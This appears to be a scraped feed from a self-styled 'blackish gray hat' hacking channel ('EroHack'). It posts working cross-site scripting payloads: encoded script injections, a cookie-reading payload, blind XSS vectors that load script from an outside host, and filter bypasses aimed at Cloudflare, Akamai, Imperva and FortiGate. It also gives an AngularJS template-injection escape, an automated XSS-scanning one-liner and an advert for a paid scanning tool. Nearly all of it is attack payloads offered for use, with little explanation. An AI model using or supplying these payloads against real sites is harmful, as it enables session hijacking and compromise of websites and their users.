Eʀᴏ ··ʜᴀᴄᴋ··
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
This payload can be used for Client Side Template injection and Reflected XSS; perhaps a code injection can be triggered in the background.

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
@EroHack0
🤖Here's another Blind XSS vector!

1"/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='


🫦Where 00 is your unique KNOXSS id.
➡️If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS

🔈 @EroHack
Payload:
"%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

#XSS

🌐@EroHack
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
🟫 WAF Fortinet FortiGate XSS Bypass

🖥Payload
<details open ontoggle="(()=>alertibrahimxss)()"></details>

#XSS #WAF #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
🙂One XSS Payload for bypass ( Akamai, imperva, cloudflare & Waf ) 🚪

HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#Xss #Payload #Waf

🌐EroHack
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
😀XSS in Office.com. The + made a difference.

Payload:
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
🔥CLOUDFLARE BYPASS (Xss)

🖥PAYLOAD:
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


#Bypass #Xss #cloudflare
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
🔝EroHack
⚠️AngularJS Client-Side Template Injection as XSS payload for 1.2.24-1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}


#Xss #Payload

EroHack
Introducing the "VulnScan" tool

Description:
The VulnScan tool is designed to gather information from a site and help you find important information about your target.
Features of this tool include port scanning, "LFI" bug vulnerability, "XSS" bug vulnerability, etc.
Additional information can be seen in the video above.
To get the tool, you can send a message to the following address. There is a discount for the first ten people.


#tool #webhacking #bugbounty #XSS

🆔 @gorunero
EroHack
Xss Attack
SHAYAN
🤔 Are you the one who thinks alert("XSS") is just a joke?
Come and listen to see how one simple line managed to blow up the admin panel! 😈💻

🎙️ Ero Podcast | Episode: "A simple form, a fatal mistake"

#XSS #HackFun #BugHuntLife #EroHack
📌 Which XSS payloads work in 2025?
A new, free article about up-to-date XSS techniques, bypassing filters, DOM XSS, and practical tips for penetration testing and bug bounty.

A fresh and insightful article exploring the current state of XSS in 2025. It dives into modern payloads that still work, techniques to bypass filters and CSP, and real-world examples of DOM-based XSS. A valuable read for penetration testers, red teamers, and bug bounty hunters.


📖 Article link:
https://santhosh-adiga-u.medium.com/xss-in-2025-the-payloads-that-still-work-3aa343e0b4f2

#Erohack #xss #payload